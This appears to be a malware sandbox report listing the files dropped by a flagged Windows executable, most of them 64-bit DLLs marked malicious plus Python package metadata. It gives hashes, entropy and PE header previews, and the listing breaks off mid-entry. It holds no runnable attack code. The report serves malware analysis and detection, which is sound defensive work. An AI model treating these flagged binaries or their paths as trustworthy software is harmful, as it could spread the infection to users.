                                                                                                                                                                                                                              Size (bytes):748032
                                                                                                                                                                                                                              Entropy (8bit):6.322076507441975
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:yd3MbPgKkTyEOvuxHEY/ChxPZAxewMjw4Jm:Y3ygKVEOv+h/C5woLJm
                                                                                                                                                                                                                              MD5:4A9E628BB3DE384DC4A622F8B8EC768A
                                                                                                                                                                                                                              SHA1:8F81B14351978D214B5804AD60A017ABF9715576
                                                                                                                                                                                                                              SHA-256:E2D24C89BF3F747F930520A3BCB18639088922C12497B431E020BCEBD231D372
                                                                                                                                                                                                                              SHA-512:4186A2D33E6BF8F4283135241C032C191E070299AEAEA433510E1FD51E07B160263C3A646CFBE0BCAC54F6C8F47910D9F1219A6FE0E0C6DC61686DA90FA8F431
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."................0...............................................A.....`.................................................l...........................................................................8............................................text...8........................... .P`.rdata..:Y.......Z..................@.P@.data....E...@..."...&..............@.P..pdata...............H..............@.0@.reloc...............f..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):89088
                                                                                                                                                                                                                              Entropy (8bit):6.142901641844917
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:75yx+TYs+6S/TF7K1uA64NHo3avnpt53ID6GTmdWUqAMx53PBS2AS:7M+TLPSrFNA64NRvnptWUqAMxbS2AS
                                                                                                                                                                                                                              MD5:749B786F9E22D2C2568A845A264D077C
                                                                                                                                                                                                                              SHA1:8DA1A2F6CE0570C703607A96FE68DD258604AFF1
                                                                                                                                                                                                                              SHA-256:CA617673BA3EC4376490CB3CFDA2C61825BED98C6288B08D9EC3213E099BBD6E
                                                                                                                                                                                                                              SHA-512:7C6EB07EDE5B7D39BFBEC1F17D07EB38D7FB4AE9C6B8D5F463089B47D3AA236A3818F2CCEE44F85BA1B0278B094A39B265B972FFB57576336E89B227360E39A2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........z............................................................`..........................................>..`....>..x...............(....................1...............................1..8...............H............................text...H........................... .P`.rdata..Fb.......d..................@.P@.data...h....`.......F..............@.P..pdata..(............P..............@.0@.reloc...............Z..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):96768
                                                                                                                                                                                                                              Entropy (8bit):6.070710207063242
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:09aJTaSaUKVjVH/pLipojyDSxpPuvZ69VxiGPW5wyKikBtdi:00OJUKHp2OyYGwi5Patd
                                                                                                                                                                                                                              MD5:0C0C2EA20931677010B3B5C81497DF5C
                                                                                                                                                                                                                              SHA1:DC89ECA3C710F2858B24C4BC03ECB50C625FC558
                                                                                                                                                                                                                              SHA-256:0C3EE662BE462994E76D32DCE18B07F0C5A79362182FAD5D3EC949F64E48E272
                                                                                                                                                                                                                              SHA-512:C3D1410038A81EC778CA8A99B978D1C8C9F45A1D3E6B6FDB2AC3793E0DE59BE71627D3870C6B99E83BCA2590A4A17E5F890D2474A7A3581864325DB22AD4F33B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."......................................................................`..........................................W..\...LX..x...............................H....J...............................J..8...............8............................text............................... .P`.rdata...k.......l..................@.P@.data...(....p.......`..............@.P..pdata...............n..............@.0@.reloc..H............x..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81920
                                                                                                                                                                                                                              Entropy (8bit):6.04788799513661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Bx75TOnYA/Gwdr9W7JBBqvbawGKj5ztbaBB/jf5:B/OnlGIKBwv9j5ztG/jR
                                                                                                                                                                                                                              MD5:B22B47AA975763D430C73AC71FD1E374
                                                                                                                                                                                                                              SHA1:99FB11E17DD2127BDD0575E2ABB3ABB55B70452B
                                                                                                                                                                                                                              SHA-256:4207DC23D56E9AE66E14A956735AB955E4835C767A50ACF3C8F8E9A36DE9BFE8
                                                                                                                                                                                                                              SHA-512:BF750BD0DC2517220B5F4C8BB395FC8757E2E2B3F32B861324DAF26D95580585FD10166C629FDFF9BA64562D281EAC912A771AE18527E0440A1529DC85459186
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........r............................................................`..........................................(..`....)..x............`..\............p..........................................8...............H............................text............................... .P`.rdata...\.......^..................@.P@.data........@.......,..............@.P..pdata..\....`.......6..............@.0@.reloc.......p.......>..............@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):62464
                                                                                                                                                                                                                              Entropy (8bit):5.870269324324492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ly9OSfUi7fLVKDpc+tYCZSAbJHGlditEIPg/g6XsaHWq6RI4oPdxr369BIEAtX16:WBNLVKhtOmGldiTPW2qb7r3KBIdF6
                                                                                                                                                                                                                              MD5:BC7EB816D8BAC39C7003355003BF81C3
                                                                                                                                                                                                                              SHA1:2A1B151C5E72D4EF881848661DFD019B1B461316
                                                                                                                                                                                                                              SHA-256:D5F22B88AEC2236A56C1E2D9990CEC4E00BDA4DB155D9B0425B34450950BDE9E
                                                                                                                                                                                                                              SHA-512:7CA957E9D5B77305F91FD3043A4975699025CAC11790C6B8FE8A3A4FAA2A6F4E9B570EFC99F449D763DC8BC97C7AE2307A6E121ADCAAC52ADECB5E610D155F7C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".........\...............................................@.......2....`.........................................0...\.......x............ ...............0......P...............................p...8............................................text...H........................... .P`.rdata...F.......H..................@.P@.data...............................@.P..pdata....... ......................@.0@.reloc.......0......................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172032
                                                                                                                                                                                                                              Entropy (8bit):6.185207380152101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:nC9DM1eFU3uj+IRZXU/W7bbJ73qK3CHd2qN4HEHFTA02+Warahu2+Warahj3qSkT:nC9DM4FU3ujlZkO7bpabHzls02+Warac
                                                                                                                                                                                                                              MD5:B611CA8FA3BC87A7355DDCCDBE8F3F93
                                                                                                                                                                                                                              SHA1:77EBF15AF059B5CDB1295F57717143DF6111EC69
                                                                                                                                                                                                                              SHA-256:396BEB486E9FDDDA95DC53A6F1096ADBBD8926F5AA3034EBBF45185A304106C1
                                                                                                                                                                                                                              SHA-512:5C0BB488BE86D87F079419273DCD93950BA860EB61FF013B71D77C30829C8DBBBB1E05D514B427303EE4F37B143288EA8ACBD9CD44AA483B1D6952EB1E201A34
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".................................................................|....`..........................................{..l...|{..x...............<....................h...............................i..8...............p............................text...h........................... .P`.rdata.."...........................@.P@.data....$...........z..............@.P..pdata..<...........................@.0@.reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):633344
                                                                                                                                                                                                                              Entropy (8bit):6.234804700155333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:S1zC7nG0yt2OXWFIPwnc7n0gZCoajSFNjwGd:S1zCEAoYIMo0gLFV5
                                                                                                                                                                                                                              MD5:772D36DFBBCBC3B635E638F3CC25036A
                                                                                                                                                                                                                              SHA1:7ABB0403BB8A44679683BD844DA93D81CBD06A13
                                                                                                                                                                                                                              SHA-256:403FDB6EE6C3CA96108F2360F949CB9EBF6B7BB3A3C55ED014D2AEC5E75AFAE7
                                                                                                                                                                                                                              SHA-512:3D9637539A4CF2E5C13C9577331E86DAF2C4B6E9E6C0231CD435A547EC5FE647B1411C2F9B707CA594374A78D9F509E724F508D58455ED0236229404CDC1B311
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....T...R.......X....................................................`..........................................m.......u..................................x....L..............................0L..8............p...............................text....S.......T.................. .P`.rdata.......p.......X..............@.P@.data...h6...........v..............@.P..pdata..............................@.0@.reloc..x...........................@.0B........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202008
                                                                                                                                                                                                                              Entropy (8bit):6.367263484296302
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:4nwukKYdeMwj1XQk67ZLXni8Es7sp0HhiviBvDKax:KrqiviMax
                                                                                                                                                                                                                              MD5:815F1BDABB79C6A12B38D84AA343196D
                                                                                                                                                                                                                              SHA1:916483149875A5E20C6046CEFFEF62DD6089DDD5
                                                                                                                                                                                                                              SHA-256:31712AE276E2CED05ECDA3E1C08FBBCC2CFF8474A972626ABA55F7797F0ED8C9
                                                                                                                                                                                                                              SHA-512:1078E7E48B6F6ED160AE2BCCF80A43A5F1CCA769B8A690326E112BF20D7F3D018F855F6AA3B56D315DC0853472E0AFFCFE8E910B5CE69CE952983CFAA496C21D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(..................................................... ......?.....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6927640
                                                                                                                                                                                                                              Entropy (8bit):5.765554952149868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:Jc7/HNCHh0IWiUDFsx3hghs7g6kIPuch+Xe16/02yWYqiVx7qb4f4wmC36nhIVcF:JcBZhxsje2kUvid5E+vbHDMiEr/l9o
                                                                                                                                                                                                                              MD5:CAE8FA4E7CB32DA83ACF655C2C39D9E1
                                                                                                                                                                                                                              SHA1:7A0055588A2D232BE8C56791642CB0F5ABBC71F8
                                                                                                                                                                                                                              SHA-256:8AD53C67C2B4DB4387D5F72EE2A3CA80C40AF444B22BF41A6CFDA2225A27BB93
                                                                                                                                                                                                                              SHA-512:DB2190DA2C35BCEED0EF91D7553FF0DEA442286490145C3D0E89DB59BA1299B0851E601CC324B5F7FD026414FC73755E8EFF2EF5FB5EEB1C54A9E13E7C66DD0C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..(..6B...............................................j......dj...`.........................................pdN.d....1O.......i......._.`I....i../... i..[..0.2.T.....................H.(....2.@............ (..............................text.....(.......(................. ..`.rdata..f7'.. (..8'...(.............@..@.data....J...`O......HO.............@....pdata..`I...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc...[... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                                              SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):31000
                                                                                                                                                                                                                              Entropy (8bit):6.553885009751671
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:I8RVBC9t6Lhz64SHfZslDT90YBI1QGjHQIYiSy1pCQQRaAM+o/8E9VF0NytuSS:1GyqHfK1HBI1QGT5YiSyvXAMxkEm
                                                                                                                                                                                                                              MD5:79CE1AE3A23DFF6ED5FC66E6416600CD
                                                                                                                                                                                                                              SHA1:6204374D99144B0A26FD1D61940FF4F0D17C2212
                                                                                                                                                                                                                              SHA-256:678E09AD44BE42FA9BC9C7A18C25DBE995A59B6C36A13EECC09C0F02A647B6F0
                                                                                                                                                                                                                              SHA-512:A4E48696788798A7D061C0EF620D40187850741C2BEC357DB0E37A2DD94D3A50F9F55BA75DC4D95E50946CBAB78B84BA1FC42D51FD498640A231321566613DAA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.....2......................................................._....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7634
                                                                                                                                                                                                                              Entropy (8bit):4.503638339817033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:qnJvhVL0qhYqlpIle4RrJQSqOBng4kS/cKM6b:4vjxhYWpce48engvK
                                                                                                                                                                                                                              MD5:8466CFC6533376D42EFA6F7423F2B8E8
                                                                                                                                                                                                                              SHA1:2BC8926FDBB07DB2AF0A8E3FF7A3BE545C8BDF6B
                                                                                                                                                                                                                              SHA-256:ADE78D04982D69972D444A8E14A94F87A2334DD3855CC80348EA8E240AA0DF2D
                                                                                                                                                                                                                              SHA-512:CC45DC470E107E63659B502F77E9EF44335F9427BE87639252D85181A8DEA65FA9D1B5F1BD196F782186BC61B144467888199537806A8CC15E2B462CAC0D46A5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GNU LESSER GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed.... This version of the GNU Lesser General Public License incorporates.the terms and conditions of version 3 of the GNU General Public.License, supplemented by the additional permissions listed below... 0. Additional Definitions... As used herein, "this License" refers to version 3 of the GNU Lesser.General Public License, and the "GNU GPL" refers to version 3 of the GNU.General Public License... "The Library" refers to a covered work governed by this License,.other than an Application or a Combined Work as defined below... An "Application" is any work that makes use of an interface provided.by the Library, but which is not otherwise based on the Library..Defining a subclass of a class defined by the Library is de
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (855)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15006
                                                                                                                                                                                                                              Entropy (8bit):4.800156894367144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:S037UxjwUbQd1Ak++k59jg8dXRNInXF2IOxcme+kQBd9Clb:d37U1LbQd1Z+3e8dhwXFacb+kQjQb
                                                                                                                                                                                                                              MD5:542BA4FBC993C39A0BC952BE72E8717F
                                                                                                                                                                                                                              SHA1:4310DB58F98C12B23286E5FA37F0E27ABEFB6A4A
                                                                                                                                                                                                                              SHA-256:3800D9B91DCEEA2065A6ED6279383362E97AC38B8E56B9343F404EE531860099
                                                                                                                                                                                                                              SHA-512:E3672EA056E5F2EFD3685C98DC0CF47E9A44F5A84DC457FC8AB31CD6DE09559C6E566D2D00F5B3CE55511E81A050DBB0DED6CF941916A6FF1019392FD96E1636
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: autocommand.Version: 2.2.2.Summary: A library to create a command-line program from a function.Home-page: https://github.com/Lucretiel/autocommand.Author: Nathan West.License: LGPLv3.Project-URL: Homepage, https://github.com/Lucretiel/autocommand.Project-URL: Bug Tracker, https://github.com/Lucretiel/autocommand/issues.Platform: any.Classifier: Development Status :: 6 - Mature.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3).Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development.Classifier: Topic :: Software Development :: Libraries.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Requires-Python: >=3.7.Description-Content-Type: text/markdown.License-File: LICENSE..[![PyPI version](https://badge.fury.io/py/autocommand.svg)](
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1308
                                                                                                                                                                                                                              Entropy (8bit):5.721750099226425
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:kn/2zDcMvX4owkE+RlpGUttyvUMDtuH5p4D127cyOMT34:knuXNv4LkEMl0UWMF5p45AcuT34
                                                                                                                                                                                                                              MD5:52BF4937018B88B9D28ED98A76B5E2AC
                                                                                                                                                                                                                              SHA1:C8D5B732C154A2D4D501454647FAFEB356B93C4E
                                                                                                                                                                                                                              SHA-256:822BBA66B41526FA547186B80221F85DA50D652BEE5493DBFE5D14085112F0C3
                                                                                                                                                                                                                              SHA-512:30E4DEFE09FB8907166682F9A33E0F7CC0203B65113155BBEC6548A1EADF7250882AF295FF2551803703274F9F387E00439D95CBBCB63D2E04E371B94556B3EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:autocommand-2.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..autocommand-2.2.2.dist-info/LICENSE,sha256=reeNBJgtaZctREqOFKlPh6IzTdOFXMgDSOqOJAqg3y0,7634..autocommand-2.2.2.dist-info/METADATA,sha256=OADZuR3O6iBlpu1ieTgzYul6w4uOVrk0P0BO5TGGAJk,15006..autocommand-2.2.2.dist-info/RECORD,,..autocommand-2.2.2.dist-info/WHEEL,sha256=2wepM1nk4DS4eFpYrW1TTqPcoGNfHhhO_i5m4cOimbo,92..autocommand-2.2.2.dist-info/top_level.txt,sha256=AzfhgKKS8EdAwWUTSF8mgeVQbXOY9kokHB6kSqwwqu0,12..autocommand/__init__.py,sha256=zko5Rnvolvb-UXjCx_2ArPTGBWwUK5QY4LIQIKYR7As,1037..autocommand/__pycache__/__init__.cpython-312.pyc,,..autocommand/__pycache__/autoasync.cpython-312.pyc,,..autocommand/__pycache__/autocommand.cpython-312.pyc,,..autocommand/__pycache__/automain.cpython-312.pyc,,..autocommand/__pycache__/autoparse.cpython-312.pyc,,..autocommand/__pycache__/errors.cpython-312.pyc,,..autocommand/autoasync.py,sha256=AMdyrxNS4pqWJfP_xuoOcImOHWD-qT7x06wmKN1Vp-U,5680..autocommand/autoco
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.842566724466667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViJR4KgP+tPCCfA5S:RtBMwlVifAWBBf
                                                                                                                                                                                                                              MD5:88F09A0EC874FD86ABCB9BC4E265B874
                                                                                                                                                                                                                              SHA1:786AB44FFD2F5C632B4DC5C1BF4AA2E91E579A05
                                                                                                                                                                                                                              SHA-256:DB07A93359E4E034B8785A58AD6D534EA3DCA0635F1E184EFE2E66E1C3A299BA
                                                                                                                                                                                                                              SHA-512:7FFEF1EC782D590D2879294C2895A5A8064ECD5FE7243CF602FCCE66A8A715F64436F17CE96070B613123847EE0C18AB0AA5BC87DB13E98A792DC07DD95E4BAB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.38.4).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                              Entropy (8bit):3.084962500721156
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:5EEln:aM
                                                                                                                                                                                                                              MD5:C3FBD7931840D987F261BEBA8C77C4D2
                                                                                                                                                                                                                              SHA1:F7EE740BCB5C39966173CC377817A157D55844F7
                                                                                                                                                                                                                              SHA-256:0337E180A292F04740C16513485F2681E5506D7398F64A241C1EA44AAC30AAED
                                                                                                                                                                                                                              SHA-512:E1FA2DE0EE416AE68C57A0173C82D42A8F24DDD1E5143A1B76A3743B5EC3DDF11FB3950F27469D3D8FCAC4958CE267A7321D2F888671EDD7C2E95D0F3F8F7455
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:autocommand.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
